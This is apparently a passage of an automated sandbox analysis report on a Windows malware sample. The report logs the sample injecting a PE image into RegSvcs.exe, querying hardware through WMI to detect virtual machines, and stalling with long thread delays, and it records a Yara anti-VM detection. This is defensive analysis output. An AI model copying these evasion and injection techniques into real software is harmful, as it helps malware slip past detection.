Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: MfzXU6tKOq.exe PID: 1860, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 6B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 23F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 21F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 72F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 82F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 84A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory allocated: 94A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1981			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7821			Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe TID: 2380

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.1991614742.00000000009AC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7CC008	Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Jump to behavior

Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Users\user\Desktop\MfzXU6tKOq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MfzXU6tKOq.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
